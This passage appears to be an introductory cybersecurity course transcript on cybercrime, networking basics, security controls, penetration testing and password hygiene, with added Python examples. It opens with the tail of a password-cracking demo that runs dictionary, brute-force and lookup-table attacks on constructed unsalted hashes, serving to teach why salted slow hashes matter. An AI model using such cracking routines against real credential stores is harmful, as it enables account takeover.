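    return salt, sha256_hex(password, salt)


def verify_salted(password: str, salt: bytes, stored_hash: str) -> bool:
    """Login check against a salted hash: re-hash with the stored salt."""
    return sha256_hex(password, salt) == stored_hash


if __name__ == "__main__":
    captured = sha256_hex("dragon")          # constructed: a hash from a stolen database
    print("dictionary:", dictionary_attack(captured, WORDLIST))
    print("brute force:", brute_force(sha256_hex("cab"), "abc", 3))
    print("candidates for 95 printable chars, length <= 8:", keyspace_size(95, 8))
    table = build_lookup_table(WORDLIST)
    print("table lookup:", table_lookup(table, sha256_hex("qwerty")))
    salt, stored = store_salted("qwerty")
    print("same password, salted, in table:", table_lookup(table, stored))
```

The first three calls succeed because the hashes are unsalted SHA-256 of weak inputs; the salted lookup fails even though the password is in the wordlist, which is why real systems use a salted, deliberately slow hash rather than plain SHA-256.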

So they just capture the packets; they copy the contents so that they can use them at a later stage.

Let's look at the history of cyber crime. So as you can see, this graph shows us how cyber crime has progressed over the years. In the 1990s, an MNC database, the Pentagon and IBM were hacked; again in the 1990s, there was a national crackdown on criminals, and the Microsoft NT operating system was pierced. So this is where hacking started becoming more mainstream, right? Before this, hacking was very much limited to organizations who used computers, but in the late 80s the internet happened, and then we had e-commerce coming in, which basically led to our online retail stores, online banking and online data stores as well, which then led to criminals hijacking this data, or hijacking your money and trying to steal it on the internet itself. In 2001, cyber criminals launched attacks against eBay, Yahoo, CNN, Amazon and other organizations. 2007 was where one of the biggest bank hacks had happened: the Swedish bank Nordea recorded at least a million dollars being stolen in three months from 250 accounts. In 2013 Adobe had 2.9 million accounts compromised and their usernames and passwords released on the open internet. In 2016 Kaspersky, one of the leading antivirus providers in the world, reported around 758 million malicious attacks that occurred, which they identified themselves.

These are some of the most famous faces in cyber security, or earlier, cyber crime. In 1988, Robert Morris: he's an American computer scientist and entrepreneur, best known for creating what is called the Morris worm, and this was way back in 1988; this is the first computer worm that was identified on the internet. Kevin Lee Poulsen, in 1990, was accused of hacking into a Los Angeles radio station called KIIS-FM, where there was a contest going on: if you were a particular number of caller and gave a correct answer, you were supposed to win a Porsche 944, and he hacked those telephone lines, ensuring that he became that particular caller and answered the question correctly. It was later on revealed that this actually happened, and he was jailed for it. Then comes David Smith. David Smith created the Melissa virus, one of the most dynamic viruses known; around March 1999 is when this happened. This virus was released, and it was a macro-based virus which affected Microsoft Word and Outlook based files. Adam Botbyl, in 2004: he's also an American computer hacker, from Michigan. He gained unauthorized access to Lowe's corporate computer network via an open, unsecured wireless access point. Now these access points back then were not that secured; these people were able to identify it, and what they attempted by doing that was to gain access to the company's network and install software which would then help them capture the credit card information of that organization, right? And this was later on identified as well, and he was prosecuted for that crime and got jailed. Just a matter of trivia: Kevin Lee Poulsen was one of the first people found guilty and banned from using computers and the internet for three years after his release. In today's world we cannot even imagine living without the internet; this guy lived for three years without it.

Now let's go a little bit further and see what would motivate people to commit such cyber crimes, right? The first and foremost motive is disrupting business continuity. Others would be looking at data theft or information theft, and manipulating that data to gain from it. So if I'm able to access your computer and steal some data that has some value to you, and sell it or make it public, you would be at a financial loss because that data no longer has any value. Creating fear and chaos by disrupting critical infrastructure: for example, a company's infrastructure crashes, the services are no longer being offered by that organization, and people start panicking, start fearing an attack by cyber criminals, and it leads to chaos. Financial loss to the target, which is very obvious: if I do a denial of service attack, or if I make a service unavailable from an organization, what is going to happen is that since that service is not functioning, the company is not going to make any money out of it, and that's going to be a financial loss. Achieving a state's military objectives: one country spying on another country, trying to gather information about their military intelligence, military activities or any other activities that can harm the original country. Demanding ransom: hackers can encrypt your data and then demand a ransom from you in exchange for decrypting the data again. Damaging the reputation of a target: impersonating a user on social media platforms, making false statements, thus damaging the reputation of that person. And propagating religious or political beliefs: religious fanatics promoting whatever cultures they want to promote, trying to gain more followers, thus bringing more unrest to the world. Any of these could become motives for cyber crime, so this is why we want cyber security.

Cyber security should be in place to prevent these kinds of attacks. So what exactly is cyber security? It refers to the practice of protecting networks, programs, computer systems and their components from unauthorized digital access and attacks. So whatever your digital footprint could be, servers, computers, switches, routers, web servers, web applications that you're hosting over there, services that you're consuming from the cloud or providing to other customers, you need to secure all of these to ensure that the integrity and the confidentiality of these services is intact and none of these services are affected by any cyber attacks, which could lead to disastrous results. So the main difference we want to understand here is the difference between cyber security and information security. Information security is about data within the organization, where they handle sensitive information or proprietary information, copyrighted or patented information, and they want to secure it from data leaks or from having the data end up in somebody else's hands. Cyber security is basically a technique used to protect the integrity of the network, so this is when you're going to go on the web and on the internet: you're going to secure the devices that you have deployed, allowing people to access your infrastructure from the outside.

So what could be the cost of not being cyber secure? If you get hacked, or if your data is compromised, or if your information is compromised, you could have a lot of repercussions. Your goodwill would go for a toss; you may be open to lawsuits, not only from clients but from customers as well; you could be open to fines or penalties from government organizations for failing to follow the law of the land; customer trust will obviously be hampered, and if you have been hacked and your data has been compromised, you wouldn't want to deal with that organization in the future. All of this could land the organization in a financial crisis, where all the lawsuits and penalties being imposed could basically bankrupt that organization and thus take it out of circulation.

So now let's look at some basic terminologies which we need to understand to go further in the cyber security world. First and foremost, network. What is a network? A network is nothing but a group of interconnected devices; it could be servers, workstations, laptops, any devices, file servers, printers and whatnot, interconnected with each other, as you can see in the diagram. It is used for communications, it's used privately for data transmissions and to communicate between various terminals so that the business can go on. It is also used to share data and information. It could be wired or wireless, so you've got a wired LAN, or at home we all have wireless networks where we connect all our devices; we use them for streaming videos, we use them to connect to the internet, surf websites, work from home, so we've got our office also set up on our Wi-Fi. So a network is nothing but a collection of interconnected devices that are allowed to communicate with each other freely so that the business can be continued in a proper manner.

Server: a server is nothing but a hardware device that is supposed to handle requests for data and information and allow network services to function for other computers and devices. So this is where we build a client-server relationship, where on the server we've got the major software, we've got the data that is stored over there, and clients that interact with the server to consume that data in a particular manner that would help them make sense of and analyze that data and generate business out of it.

Then the internet: the internet is nothing but the collection of multiple networks globally. So all the networks that we have across the globe, when they are interconnected with each other, that is what the internet is. And if you just go back to when we talked about servers, this is what allows the internet to be formed: when every organization publishes its servers on the internet and allows everyone to interconnect through those servers, that is where the internet comes in, the servers being the backbone of the internet. Obviously, for the servers to communicate with each other we will need switches, routers and other devices for the data transmissions to happen. So these are the multiple networks, could be individual networks, interconnected together, which would form the internet across the globe.

For the internet to work there would be a set of protocols for transmissions to be allowed across the globe. Now this is where TCP/IP, or Transmission Control Protocol over Internet Protocol, comes into the picture. So if you remember, we use communication channels like TCP, the Transmission Control Protocol, and UDP, the User Datagram Protocol; when we connect to web servers we talk about the HTTP protocol, and the HTTPS protocol if you want it secure; then we'll talk about IMAP, POP3 and all of these protocols. Now where do these protocols come from? It is nothing but the TCP/IP suite of software which contains all of these protocols, which allow computers to communicate with each other. If TCP hadn't been there, our network would have collapsed.

Now when we have TCP/IP and we want to communicate across the globe, how would we identify devices on the internet, or even on the intranet? Because the devices don't know us; they are not going to use our usernames and passwords to communicate with each other. But when I want to connect to a website or a device, how do I identify it on the internet or the intranet? I obviously use IP addresses. Now IP addresses are nothing but Internet Protocol addresses, which are 32-bit addresses which look exactly like the one shown on your screen: 172.16.254.1. Now there is a lot of classification of IP addresses, and some of these IP addresses work on the internet, some of them are supposed to work on private LANs, but I will reserve that for a later topic. Then the second way that we are identified on the internet or the intranet is with MAC addresses. So Media Access Control, or MAC, addresses are hard-coded addresses that are given to our network interface cards. These cannot be modified physically at any point in time; however, there are techniques to spoof MAC addresses, with which we can then obfuscate our existing address and give ourselves a new one. That would again be discussed in a later lecture.

A router: we've been talking about routers and switches. A router is nothing but a device that passes packets back and forth across networks; it routes the data on the appropriate path. So it is an intelligent device: it can understand IP addresses and MAC addresses, and it can identify different paths for reaching a particular network. For example, if I'm sitting in India and I want to communicate across the world to America, there would be a specific path that needs to be followed for my data packet to reach the other side of the world. It is the routers that would map this path and store it in their cache, so when I try to connect to that server they would retrieve it from the cache and send the packet across the globe. So the home router that we use at home on Wi-Fi is our default gateway to connect to the internet, and thus it allows our internal devices to communicate with each other using internal IP addresses, and when we want to go to the internet it will then route the traffic onto the internet and send the packet to the other servers that we want to communicate with.

Now what is a domain? A domain is referred to as a group of computers and other devices that are interconnected and treated as a whole. Now a domain is used by an organization. So let's say I am XYZ, XYZ being the name of the organization, and I want to create a domain which will allow me to create a group of interconnected computers for my employees to interconnect with each other and send and manage data. I am going to create a domain for my organization, attach all the devices, create users and interconnect them using a domain. So this is where you're going to have a centralized approach, a server-client relationship, where you're going to have a main domain and you're going to have devices connected to the domain. Now when we go on to the internet, the domain name is nothing but the base part of a website name. So when you say google.com and you type it in your browser, you're taken to the web page called google.com, which is the search engine that you're connected to. But for Google, the organization at the other end, they would have a data center over there which would have all that relevant data which allows you to search through that information. So for them the domain would be the internal part, where they've got this cluster of servers creating a data center where all that information is stored, but for us as consumers, a website called google.com would be a domain for us to visit that particular website and consume the services that they're offering on the internet. So here the example is https, which means that it is a secure website, port 443, and we're connecting to cybersecurity.com. cybersecurity.com becomes the domain name; https becomes the protocol that we want to utilize to connect to that particular website.

Then we come across DNS, or the Domain Name System. It is nothing but an index, something like a phone book, which is responsible for mapping the domain name to its corresponding IP address. Now remember I said that there are only two ways we are identified on the internet or the intranet: either the IP address or the MAC address. If computers are talking to each other it would obviously be IP addresses, but if I type in google.com I'm giving it a domain name, and the internet does not understand domain names. So there is a DNS server which works like an index, or more like a phone book, which will have a list of all the domains with their corresponding IP addresses. So whenever I type in google.com, the request goes to a DNS server, the DNS server is queried, the IP address of google.com is identified and pasted onto the packet, and then the packet is routed through the router along the path that it has determined to reach the google.com server. Here, replace google.com with cybersecurity.com. So as you can see on the screen, the local PC queries the DNS server and the DNS server replies back with the IP address. Now if you're wondering how this works, if we take the example of home networks, the ISP, or internet service provider, gives us a default gateway, or a router, with their own IP addresses for DNS servers and default gateways. So when we try to connect through the router, the router has the IP address of the DNS server and it routes that query to the DNS server; the DNS server replies back with the appropriate IP address; the router then takes that IP address, figures out the path and sends it across to the targeted server.

DHCP, or the Dynamic Host Configuration Protocol: it is a protocol that dynamically assigns IP addresses to the devices in the network. So we have discussed that IP addresses are required by computers to communicate with each other, but who associates or gives these IP addresses to these computers? For that to happen we have got a DHCP server that is created; if you take your home network, it is the router that has the DHCP role installed on it. So whenever a machine boots up, it sends out a broadcast request looking for the DHCP server, and then there's a communication with the DHCP server; the DHCP server then allocates an IP address to the computer that is requesting it, and once the IP address is allocated an entry is made in the DHCP server's cache with the corresponding MAC address of that particular machine.

Then we come to the next topic, called VPN, or a Virtual Private Network. It is a connection between a VPN server and a VPN client; it's basically an encrypted channel that you're creating between two endpoints.
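The DHCP exchange just described, the booting client's broadcast, the server's allocation, and the MAC-to-IP entry kept in the server's cache, as an added Python example that is not code from the video. Messages are plain dicts rather than the real DHCP wire format, and the address pool, MAC addresses and timings are constructed; the block goes a little beyond the video by also handling the two things a real server must, an exhausted pool and expired leases.

```python
"""Toy DHCP server: the boot-time DISCOVER / OFFER / REQUEST / ACK exchange and
the lease table (MAC address -> IP address) that the section describes.

Added example for this tutorial, not code from the video. Messages are plain
dicts rather than the real DHCP wire format, and the address pool, MAC
addresses and timings are constructed.
"""
import ipaddress
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass
class Lease:
    ip: str
    mac: str
    expires_at: float


class DhcpServer:
    def __init__(self, pool_start: str, pool_end: str,
                 lease_time: float = 3600.0, offer_timeout: float = 60.0):
        first = int(ipaddress.IPv4Address(pool_start))
        last = int(ipaddress.IPv4Address(pool_end))
        self.pool = [str(ipaddress.IPv4Address(n)) for n in range(first, last + 1)]
        self.lease_time = lease_time
        self.offer_timeout = offer_timeout
        self.leases: Dict[str, Lease] = {}   # the server's MAC -> IP "cache"
        self.offers: Dict[str, Lease] = {}   # offered but not yet acknowledged

    def _expire(self, now: float) -> None:
        """Drop leases and offers whose time has run out so the IP is reusable."""
        for table in (self.leases, self.offers):
            for mac in [m for m, entry in table.items() if entry.expires_at <= now]:
                del table[mac]

    def _pick_ip(self, mac: str) -> Optional[str]:
        if mac in self.leases:               # a returning client keeps its IP
            return self.leases[mac].ip
        in_use = {e.ip for e in self.leases.values()} | {e.ip for e in self.offers.values()}
        return next((ip for ip in self.pool if ip not in in_use), None)

    def handle(self, msg: dict, now: float = 0.0) -> Optional[dict]:
        """Process one client message; returns the reply, or None to stay silent."""
        self._expire(now)
        mac = msg["mac"]
        if msg["type"] == "DISCOVER":        # broadcast by a booting client
            ip = self._pick_ip(mac)
            if ip is None:
                return None                  # pool exhausted: no offer is made
            self.offers[mac] = Lease(ip, mac, now + self.offer_timeout)
            return {"type": "OFFER", "mac": mac, "ip": ip}
        if msg["type"] == "REQUEST":         # client accepts an offer or renews
            ip = msg["ip"]
            offered = self.offers[mac].ip if mac in self.offers else None
            current = self.leases[mac].ip if mac in self.leases else None
            if ip not in (offered, current):  # not something we offered: refuse
                return {"type": "NAK", "mac": mac}
            self.offers.pop(mac, None)
            self.leases[mac] = Lease(ip, mac, now + self.lease_time)
            return {"type": "ACK", "mac": mac, "ip": ip, "lease_time": self.lease_time}
        return None

    def lease_table(self) -> Dict[str, str]:
        """The MAC -> IP mapping an administrator would see on the router."""
        return {mac: lease.ip for mac, lease in self.leases.items()}


if __name__ == "__main__":
    server = DhcpServer("192.168.1.10", "192.168.1.11", lease_time=100)
    laptop = "aa:bb:cc:00:00:01"                       # constructed MAC address
    offer = server.handle({"type": "DISCOVER", "mac": laptop}, now=0)
    print("offer:", offer)
    ack = server.handle({"type": "REQUEST", "mac": laptop, "ip": offer["ip"]}, now=1)
    print("ack:", ack)
    print("lease table:", server.lease_table())
```

The `now` parameter stands in for the server's clock so expiry can be exercised without sleeping; a client that asks for an address it was never offered gets a NAK, which is also the behaviour that stops one host from simply claiming another host's lease.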

And the main reason for a vpn is to encrypt your data so that it is now no longer subject to man in the middle or eavesdropping or modification attacks so this is a layer of security that you are adding when you are connecting to the internet using an encrypted channel

Which should prevent you from getting hacked or your data being compromised by hackers so as you can see here and if you remember the previous top previous slides that we have seen the hacker was able to copy the data very easily now that it is an encrypted channel even if

The hacker tries to eavesdrop and capture that data it will be formatted in such a way that they would not be able to make sense out of it now the attacker or the hacker will try will have to try to decrypt the data so that’s another attack that they’d have

To execute to find out the encryption key decrypt the data and then look at what the data was then we come across botnet now first let’s first understand what bots are bots are nothing but the softwares that can be installed on vulnerable machines that would allow the

Hacker to send commands to the infected machines to generate some traffic or to do what the command tells them to do so most of the botnets are used for distributed denial of service attack if you remember the dos and ddos that were discussed a while back this is where we

Tied up with how they are executed so a bot master or a hacker let’s call them a hacker would try to identify vulnerable devices across the internet and try to install the bot onto those devices the bot essentially is a software that would revert back to the bot master and

Advertise their availability whenever they have been powered on a collection of such infected devices would essentially be called a botnet when there are enough number of machines that the attacker fill fields are good enough to launch that attack on the targeted servers the hacker will then initiate those devices send the commands through

The botmaster to the bots and the bots would then generate that kind of traffic what whatever they have been configured for and then attack the targeted server now this is also done to opt to mask the identity of the hacker since the attack is being generated through the botnet

The ip addresses of the botnet computers would be reported to the targeted server not the actual hackers ip address so it to figure out who the attacker was would be very much difficult depending on the size of the botnet so this you can see is the attack that is included over the

Victims and the malicious traffic has been generated through the botnet and the victims have been targeted through that so as said once that traffic has been done to forensically investigate at the victim’s end they would find the ip addresses of the botnet and not the attacker alright let’s start talking

About network security controls network security controls are nothing but implementations of various devices to enhance the security of a particular network these could be firewalls intelligent detection systems or intrusion prevention systems honeypots unified threat management systems and so on so forth the next gen firewalls that

We talk about right so let’s look at a review of what these devices are now a firewall can be a hardware or a software that is responsible for allowing or disallowing a certain amount of traffic to or from your computer so these are basically created to enhance the

Security portion of your network where you can configure them for certain level of traffic to be allowed or some traffic to be disallowed now a firewall is not going to decide by itself what is a good amount of traffic or what is bad traffic you’re going to configure the firewall

By creating rules based on ip addresses port numbers protocols and what may and based on this the firewall will then analyze the traffic coming in or going out to the inbound or the outbound rules and if the traffic is allowed it will allow the traffic to go through if

There’s an explicit rule which says deny the traffic it will drop the packets or it will delete the package it will not allow the packets to go past it so if it is good traffic that means it matches a rule that has been created that allows the traffic to go through the firewall

Will allow it if it’s bad traffic that means that there is a rule which denies the traffic to pass through it will get blocked at the firewall level itself it will the firewall will not allow it to enter the network similarly an intrusion detection system it is designed to

Detect unauthorized access to systems or intrusion attempts as well now it works along with the firewall and the main thing is that here there’s a database against which it can compare the traffic so most of the attacks that we’ve talked about there are some distinct signatures that would cause concern or that would

Highlight that kind of an attack most of the organizations try to develop these kind of signatures have them in a database and store them on the ids so that ids can analyze the incoming traffic look at patterns from the traffic coming in or going out compare it to the database of the signatures

That it has and if it matches any of the signatures it will then detect that as an attack and send an alert to the administrator where the administrator will then have to manually come in and check it out a intrusion prevention system as described earlier or as mentioned earlier can be configured to

React to that particular event so if it detects something that can be classified as an intrusion an administrator can pre-configure it to to react to that particular packet in a particular manner for example drop the packets or reflect them to a honey pot or want the administrator or do all of these things

At the same time so as you can see on the diagram and the internet there’s a hacker a sense of the data packets come in the firewall is not able to analyze the traffic because of a firewall cannot analyze the contents of a packet it can

Only look at the header it can only look at the ip addressing and the ports that that have been created or the rules on which those things have been mentioned and then it allows the data to go through it reaches the ideas the ideas then looks at two ways to scan

One is a signature that we’ve just spoken about where the developer of the ids creates those signatures and stores them onto the database or another thing that is known as heuristic scanning which is nothing but behavioral scanning so it looks at the behavior of the data and if the behavior looks malicious it

Will then raise an alert and warn the administrator then let’s come to honeypots we just discussed in the previous slide that an ips or an intrusion prevention system can be pre-configured that if it detects an animally or if it detects an intrusion it may redirect the traffic to a

Honeypot what is a honeypot a honeypot is a decoy system it is created to showcase a certain set of vulnerabilities to try to attract the attention of a attacker now the word here is used as lure but it’s more to deceive the attacker for example if the

Attacker has been able to bypass your firewall and your ideas and now can scan the entire subnet when they scan it they would come across a device which is pretty vulnerable or showcases some vulnerabilities which would definitely impress the hacker because they would think that it is a vulnerable server

Which contains some valuable data and that exactly what honeypot is it’s a decoy server trying to uh trying to act as a production server trying to showcase that it has some valuable data but also has some vulnerabilities in it so that the attacker can be attracted

Towards it and spend some time trying to attack it or analyze the honeypot at the same time the honeypot will analyze the data traffic and it will warn the administrator of a possible intrusion which will give the administrator enough time to secure the rest of the network

And will also get to analyze the logs of the honeypot one to try to understand what kind of attacks the attacker is trying to create and try to reverse engineer and identify the attacker at the same time let’s talk about security testing security testing is nothing but

a method which is carried out to identify threats and loopholes in a system. Here we are going to do a vulnerability analysis and a penetration test; we may also go ahead and do a security audit. So what are vulnerability scanning, penetration testing and security auditing?

Vulnerability scanning is the activity you conduct to identify possible weaknesses, issues, vulnerabilities or misconfigurations that exist in your infrastructure. It is a proactive exercise where a team of security experts launches a vulnerability scanner against certain devices they have pre-identified and, once the report from the vulnerability scanner comes in, analyzes the report and makes sense of it to see whether any vulnerabilities can be identified on those devices. This is obviously an ongoing process. Why? Because operating systems are patched and upgraded, new versions of software are released, and we keep upgrading and changing our IT infrastructure ever so often; hence the IT infrastructure, I should say, is ever evolving, and to stay abreast of all the latest vulnerabilities and threats we need to do vulnerability analysis on an ongoing basis to identify

possible threats to the organization. So then what is penetration testing? Vulnerability analysis just identifies the vulnerabilities, gaps and misconfigurations that may exist in the organization's infrastructure. A penetration test is basically there to validate whether those reported vulnerabilities are real and, if yes, how complex they are, what the impact would be, what the technological impact would be, what kind of data would be compromised, and what the end result of that attack would be if it actually happened in the real world. So here a group of ethical hackers simulate an attack from a hacker's perspective or from an insider's perspective, a malicious outsider or a malicious insider depending on how they perceive the vulnerability, and then test the vulnerability to see how it can be exploited, to what extent it can be exploited, and what the compromise or data leakage would be if this vulnerability gets exploited.

There are three ways a penetration test can be conducted: black box testing, gray box testing and white box testing. In black box testing the penetration tester has no knowledge about the organization, their infrastructure, applications or anything else. This simulates a hacker sitting on the outside who has no knowledge of the organization, so they start from the information gathering phase, where they try to figure out the IP addresses, IP ranges, devices, operating systems, applications and anything and everything that the organization uses, then try to find vulnerabilities within them, and then try to attack those vulnerabilities. This is a very time consuming and costly audit. The second one is a gray

box testing audit, where partial knowledge is given to the penetration tester. This simulates a regular user's kind of attack. Let's say I am a regular user in an organization, and when I say a regular user I mean I'm not an administrator, so I have limited access; based on that limited access and the limited knowledge I can gather about the infrastructure by being a regular employee, we simulate a test with that knowledge to see whether an employee can take advantage of any vulnerabilities and then try to worm their way into the organization's infrastructure and hack it.

White box testing, on the other hand, is where we're looking at a malicious insider who already has all the access and all the controls in their hands. We simulate administrative access and then try to figure out whether this administrator can escalate their privileges, gain some other administrator's access, and then compromise data. For example, even if I'm an administrator, I am not the only administrator in the organization: there would be backup administrators, system administrators, Active Directory administrators, application administrators, database administrators and so on and so forth. Every single component that we have may have a different administrator; switches would have a different administrator, and the same goes for firewalls or any other security controls that you have. So if I am the administrator for backup, can I then work my way out, escalate my privileges to a regular administrator or a system administrator, crack their passwords, get access and manipulate some data? These are the three types of penetration testing audits that you will come across. There would be some different subtypes,

but every organization can customize these kinds of audits to whatever they require. Then we come to security auditing. Security auditing is nothing but an internal check that is carried out by internal auditors, that is, people who are employees within the organization, to find flaws in the organization's information system. Now, this is more on the compliance side. It may take inputs from the vulnerability assessment and the penetration test, but overall we want to see what kind of policies we have in our organization, whether those policies are working properly, whether they make sense, whether there are any gaps, and, based on the technical inputs from the VAPT team, how we map against the policies that we have defined for that organization.

For example, a password policy. We have documented that the password policy should be effective enough that passwords cannot be easily brute forced; that's a high level policy. Then we dictate a procedure for that policy to be implemented, where we say we want the systems to be configured so that passwords meet some complexity standard: for example, they should use uppercase and lowercase A through Z, 0 through 9 and special characters, they should be randomized, and they should not be dictionary based or based on the user's name. This is the policy that we have created and these are the procedures that we have defined; are they actually being implemented in the real world? A vulnerability analysis would determine whether the passwords are probably weak or not, so if the vulnerability report comes back and says the passwords are probably weak, then a penetration tester would go in and try various attacks to see whether passwords can be compromised.

Now, first and foremost, what is cyber security? There are three main pillars of cyber security that we have dealt with since the inception of

computers, and they're known as the confidentiality, integrity and availability triad, also known as CIA, not to be confused with the American intelligence agency. Here we're looking at three different pillars: we want our data to remain confidential, the integrity of the data to be intact, and the data to be available at all points in time. Let's talk about these three aspects.

The principle of confidentiality asserts that information and functions can be accessed only by authorized parties. For example, when you password protect a file, what are you trying to do? You're trying to prevent other users from accessing your data and peeping into your files, so that your data remains confidential and is only shared with people who know the password.

Integrity is where the trustworthiness of the data comes into the picture. Say you have a spreadsheet with a lot of information about users and their login activities and whatnot, and you want to ensure that the data is not modified by any unauthorized user; so you verify that the information is correct and has not been modified by anybody who is unauthorized.

The availability part ensures that the data is made available to all authorized users when and where they want it. The principle of availability asserts that systems, functions and data must be available on demand according to agreed-upon parameters based on levels of service. This is where your service level agreement comes in. For example, when we log on to Gmail we always assume that Gmail is going to work and be available online; at no point in time, or on very few occasions, has it happened that you've gone on to the internet, typed gmail.com and found the website unavailable. In fact, if the website doesn't open we figure the internet is not working, right? Gmail as a service is always made available. Now, when we talk about threats to CIA, the confidentiality, integrity and

availability, we talk about them in two different parameters: cyber crime and hacking. So what is cyber crime? Cyber crime is any criminal or unauthorized activity that involves the use of a computing device and results in a security incident at the victim's end. Most cyber crimes are carried out in order to profit from them: criminals run phishing attacks to steal money out of your bank accounts, or try to con you into giving out your credentials, thus compromising your email accounts or your social media accounts, and try to gain access to your identity. Cyber crimes are generally carried out against computers or devices directly, to damage or disable them, spread malware, steal secret information, and so on. This covers the motivation part of cyber crime: what would be the motivational aspect for a person to conduct such an activity? Basically, to cause damage, like WannaCry in 2017. The perpetrators behind WannaCry probably gained a lot in the ransom they demanded for that data to be decrypted, but it also cost the world a lot of money in lost profits.

Let's move on to cyber crime. What do we mean by cyber crime? If you remember, a few slides back we talked about information security and cyber security and the difference between the two. Information security could be about anything normally contained within the organization, the data that the organization has, and us securing that data by introducing the security controls we talked about. Cyber security would be something that is on the internet or on the web: any web application I have deployed on the internet, any databases I have out there, that would come under cyber security. So if your Facebook account gets hacked or your OneDrive gets hacked, that's where cyber security comes into the picture; but if your physical computer gets hacked because your password got cracked by a physical attack, that's information security.

Some of the basic ways of preventing cyber attacks on us: use unique and strong passwords. We've just discussed the complexity of passwords: we want to keep them random, they should not be guessable, they should not be based on dictionary words, and they should be randomized in such a way that they cannot be predicted or guessed.
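Here is the password procedure described above turned into a checker, as an added example that is not part of the course. It enforces upper and lower case letters, a digit, a special character, a minimum length, and rejects passwords built on a dictionary word or on the user's own name, after undoing the common letter-for-symbol substitutions that a cracker would also undo. The 12-character minimum and the tiny word list are assumptions for the demo; a real audit would load a cracking dictionary such as rockyou.txt.

```python
"""Added example (not from the Simplilearn course): a checker for the
password procedure described above.  Assumptions for the demo: the
minimum length of 12 characters and the tiny word list below, which
stands in for a real cracking dictionary."""
import re
import string

MIN_LENGTH = 12  # assumption: the 12-16 character guidance in the course

# constructed, deliberately tiny stand-in for a real cracking dictionary
DICTIONARY = {"password", "welcome", "letmein", "qwerty", "monkey", "dragon", "summer"}

# common "leet" substitutions attackers undo before a dictionary attack;
# the checker undoes them too, so P@ssw0rd is still caught as "password"
_LEET = str.maketrans("@$013!", "asolei")


def _normalize(text: str) -> str:
    """Lower-case and de-leet a candidate so it can be compared to words."""
    return text.lower().translate(_LEET)


def check_password(password: str, username: str = "") -> list:
    """Return the list of policy violations; an empty list means compliant."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    if not any(c.islower() for c in password):
        problems.append("no lowercase letter")
    if not any(c.isupper() for c in password):
        problems.append("no uppercase letter")
    if not any(c.isdigit() for c in password):
        problems.append("no digit")
    if not any(c in string.punctuation for c in password):
        problems.append("no special character")

    normalized = _normalize(password)
    if any(word in normalized for word in DICTIONARY):
        problems.append("based on a dictionary word")

    # reject the user's name and its parts (e.g. "j.smith" -> "smith")
    parts = [p for p in re.split(r"[^a-z]+", username.lower()) if len(p) >= 3]
    if username and (username.lower() in normalized or any(p in normalized for p in parts)):
        problems.append("based on the user's name")
    return problems


if __name__ == "__main__":
    # constructed sample passwords and usernames for the demo
    for pw, user in [("password123", "bob"), ("P@ssw0rd2021!", "bob"),
                     ("Alice.Wonder#2024", "alice"), ("Tr0ub4dor&3Horse", "bob")]:
        print(pw, "->", check_password(pw, user) or "OK")
```

The normalization step is the part an auditor cares about: a password that passes every complexity box (P@ssw0rd2021!) is still a dictionary word once the substitutions are reversed, which is exactly the candidate a cracking rule set would try first.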

The length of the password should be good: the bare minimum should be eight characters, and even that is not recommended in today's world; it has to be at least 12 to 16 characters. An operating system, I think, in today's world will support up to 24 or 26 characters, and if you go into encryption software they support up to 60-odd characters of password. You want to keep those unique, you want to rotate those passwords on a regular basis, and you do not want to reuse old passwords again and again.

Avoid public Wi-Fi; that's a must. We always look for free Wi-Fi; we go to coffee shops because they advertise free Wi-Fi, which is nowadays a unique selling point for coffee shops and establishments, and we go there and connect to the Wi-Fi because we get free internet and get to surf whatever we want. The problem is we have no idea who else is connected to that Wi-Fi and what kind of attacks they are carrying out. We will discuss Wi-Fi attacks later on in one of the later videos, where I can demonstrate how these attacks work, but for now just remember that public Wi-Fi is very risky, and if your security is not up to the mark you might just end up getting hacked like nobody's business.

Ignore and delete mails from unknown senders. Phishing attacks are very common in today's world: you get an email saying you've won a lottery, or you've been chosen for something, or "please click here to download your free software", and so on, and those emails are plenty nowadays. I received an email yesterday where there was a Nigerian prince who had died and had left around 500 million dollars behind, and there was this accountant who wanted to smuggle that money out; it was a huge email giving me all the details, and out of seven billion people on this planet they identified my email address and wanted to share half the money with me so that they could masquerade the money and avoid paying taxes, inheritance taxes and whatnot. It was a ridiculous scheme; I mean, being chosen one out of seven billion, our luck can't be that good, can it? So you have to be wary about these attacks. Always ask the question: if you've won a lottery, did you purchase the ticket? No.

So there's never a free lunch, right? Always keep questioning the things that you've been getting. I'm not saying ignore them, because some of them may actually turn out to be true, there's always that one percent hope, but always investigate those things to see whether they are spam or whether there is a fraud going on, and if yes, you yourself can communicate with the law enforcement agency and try to figure out who is responsible for that fraud.

Make use of antivirus software and always keep it updated. Again, let's not go for the free antivirus software, because it may be good at detecting infections, but when it comes to disinfecting those files, that's where they ask for money, and that's when you're going to run around saying, okay, let me see which is a very good antivirus to disinfect this kind of infection. There are a lot of antiviruses out there, I know, and it's very confusing which is the best one today. Now, the problem is that whichever is the best one in the market may not be the best one for the operating system that you're using. For example, there would be a good antivirus for Windows 7, but the same antivirus installed on Windows 8 or Windows 10 wouldn't be that effective. So always do an investigation. The best way to look at antiviruses and identify which antivirus suits you is to investigate that antivirus and see its detection rate: see how often it detects the infections that you're looking at. What you can do is head to a website called virustotal.com, that's v-i-r-u-s-t-o-t-a-l dot com; it's a Google owned website and they have around 60 to 70-odd scanners on that website, most of the known antivirus scanners are there. Try to get hold of an infected file (be very careful, you don't want to get infected yourself, or rather your computer), upload it to that website and analyze that file to see which antivirus detects those kinds of viruses. A few files, a few infections here and there, and you will come to know which antiviruses would work for you.

Use multi-factor authentication or two-step processes for authentication; just don't

rely on a username and password. Registered devices get OTPs, either on your email or on your devices, and that gives you an added layer of security: if your password gets compromised, that's still okay, because now the hacker will need to simulate your phone as well. That's an added headache and it may just not be worth it; there are so many other people who don't use these kinds of techniques and who can be hacked much more easily than people who have an added layer of security.

